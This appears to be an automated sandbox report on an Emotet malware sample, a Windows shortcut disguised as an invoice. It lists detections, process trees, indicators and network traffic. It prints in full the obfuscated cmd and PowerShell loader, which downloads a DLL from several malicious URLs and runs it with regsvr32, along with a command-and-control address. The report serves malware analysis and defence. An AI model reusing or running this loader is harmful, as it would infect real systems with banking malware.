Windows Analysis Report
RechnungsDetails 2022.20.05_1044.lnk

Overview

General Information

Sample Name: RechnungsDetails 2022.20.05_1044.lnk
Analysis ID: 632057
MD5: 235332fd9cf506fd4508ac0fb8d1b64a
SHA1: 514f37f2b32eb85d18588f44670830e355c69749
SHA256: 6a6547bc259080ecf6b26354da81caaa639216191f5a59d9cc088a2e9597e9c9
Tags: lnk

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 7040 cmdline: C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)} MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7100 cmdline: powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 3008 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 6180 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 1592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6244 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
RechnungsDetails 2022.20.05_1044.lnk | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x2b3:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x2b3:$r2: p^o^w^e^r^s^h^e^l^l
RechnungsDetails 2022.20.05_1044.lnk | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
Process Memory Space: powershell.exe PID: 7100 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
            • 0x2835:$b2: ::FromBase64String(
            • 0x2b90:$b2: ::FromBase64String(
            • 0x128b5:$b2: ::FromBase64String(
            • 0x12f89:$b2: ::FromBase64String(
            • 0x13532:$b2: ::FromBase64String(
            • 0x1388f:$b2: ::FromBase64String(
            • 0x1448d:$b2: ::FromBase64String(
            • 0x149b0:$b2: ::FromBase64String(
            • 0x1ed0a:$b2: ::FromBase64String(
            • 0x1f065:$b2: ::FromBase64String(
            • 0x39363:$b2: ::FromBase64String(
            • 0x43461:$b2: ::FromBase64String(
            • 0x5e4ad:$b2: ::FromBase64String(
            • 0x5e731:$b2: ::FromBase64String(
            • 0x930f7:$b2: ::FromBase64String(
            • 0x93454:$b2: ::FromBase64String(
            • 0x93b08:$b2: ::FromBase64String(
            • 0x941dc:$b2: ::FromBase64String(
            • 0x94825:$b2: ::FromBase64String(
            • 0x94d46:$b2: ::FromBase64String(
            • 0xc7733:$b2: ::FromBase64String(

Source | Rule | Description | Author | Strings
3.2.regsvr32.exe.2220000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
4.2.regsvr32.exe.1e40000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
4.2.regsvr32.exe.1e40000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
3.2.regsvr32.exe.2220000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

No Sigma rule has matched
No Snort rule has matched

                    AV Detection

                    Source: RechnungsDetails 2022.20.05_1044.lnk | ReversingLabs: Detection: 41%
                    Source: http://digitalkitchen.jp/images/PVn/ | Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196/hU | Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196/ | URL Reputation: Label: malware
                    Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/ | Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/s64 | Avira URL Cloud: Label: malware
                    Source: http://piffl.com/piffl.com/a/ity. | Avira URL Cloud: Label: malware
                    Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ | Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/ | URL Reputation: Label: malware
                    Source: http://piffl.com/piffl.com/a/ | Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/tem | Avira URL Cloud: Label: malware
                    Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/ | Avira URL Cloud: Label: malware
                    Source: jsonsintl.com | Virustotal: Detection: 5%
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | Metadefender: Detection: 31%
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | ReversingLabs: Detection: 40%
                    Source: RechnungsDetails 2022.20.05_1044.lnk | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | Joe Sandbox ML: detected
                    Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0

                    Networking

                    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 173.82.82.196 8080
                    Source: Joe Sandbox View | ASN Name: MULTA-ASN1US MULTA-ASN1US
                    Source: Joe Sandbox View | ASN Name: DIMENOCUS DIMENOCUS
                    Source: Joe Sandbox View | IP Address: 173.82.82.196 173.82.82.196
                    Source: global traffic | HTTP traffic detected:
                      HTTP/1.1 200 OK
                      Date: Mon, 23 May 2022 06:54:12 GMT
                      Server: Apache
                      X-Powered-By: PHP/5.6.40
                      Cache-Control: no-cache, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 23 May 2022 06:54:13 GMT
                      Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
                      Content-Transfer-Encoding: binary
                      Set-Cookie: 628b2f9502924=1653288853; expires=Mon, 23-May-2022 06:55:13 GMT; Max-Age=60; path=/
                      Last-Modified: Mon, 23 May 2022 06:54:13 GMT
                      Content-Length: 365056
                      Vary: Accept-Encoding,User-Agent
                      Keep-Alive: timeout=5, max=40
                      Connection: Keep-Alive
                      Content-Type: application/x-msdownload
                    Source: global traffic | HTTP traffic detected:
                      GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                      Host: www.jsonsintl.com
                      Connection: Keep-Alive
                    Source: global traffic | TCP traffic: 192.168.2.5:49782 -> 173.82.82.196:8080
                    Source: unknown | TCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify | equals www.facebook.com (Facebook)
                    Source: svchost.exe, 00000012.00000003.667854803.0000027EE4174000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Follow us on Twitter: http://twitter.com/spotify | equals www.twitter.com (Twitter)
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
                    Source: powershell.exe, 00000002.00000002.480786131.000001AFF8FF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527929794.000000000063D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704460917.000000000063D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704786180.0000027EE4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000002.00000002.481052167.000001AFF90D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                    Source: svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: regsvr32.exe, 00000004.00000003.527929794.000000000063D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704460917.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enb
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalkitchen.jp/images/PVn/
                    Source: svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                    Source: powershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsonsintl.com
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
                    Source: powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/ity.
                    Source: powershell.exe, 00000002.00000002.461186935.000001AFE0EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: unknown; DNS traffic detected: queries for: www.jsonsintl.com
                    Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_0000000180006B24 InternetReadFile
                    Source: global traffic; HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: www.jsonsintl.com; Connection: Keep-Alive

                    E-Banking Fraud

                    Source: Yara match; File source: 3.2.regsvr32.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.regsvr32.exe.1e40000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.regsvr32.exe.1e40000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 3.2.regsvr32.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLE; Matched rule: Detects powershell keyword obfuscated with carets; Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLE; Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
                    Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Windows\System32\regsvr32.exe; File created: C:\Windows\system32\ZrCipB\
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C4_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D104_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800201184_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B184_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A5244_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F244_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F3284_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D284_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E1304_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800291344_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800081344_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217384_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF384_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800221404_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283484_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C4_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F504_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B3504_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800069544_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F5544_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C4_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B5644_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800121684_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135684_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243704_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083704_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800157744_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800123784_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800191784_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800251804_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800019804_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800215884_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A9884_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800181904_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800139944_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B984_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800289984_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C4_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C4_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA04_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A04_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A64_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA84_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC4_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC4_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B04_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B44_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B84_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB84_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B84_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC4_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC4_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C04_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC04_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C84_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC4_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D44_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D84_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC4_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC4_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E04_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA5246BD70 appears 113 times
                    Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA52467FF0 appears 31 times
                    Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00007FFA5246B3B0 appears 148 times
                    Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
                    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                    Source: RechnungsDetails 2022.20.05_1044.lnk ReversingLabs: Detection: 41%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
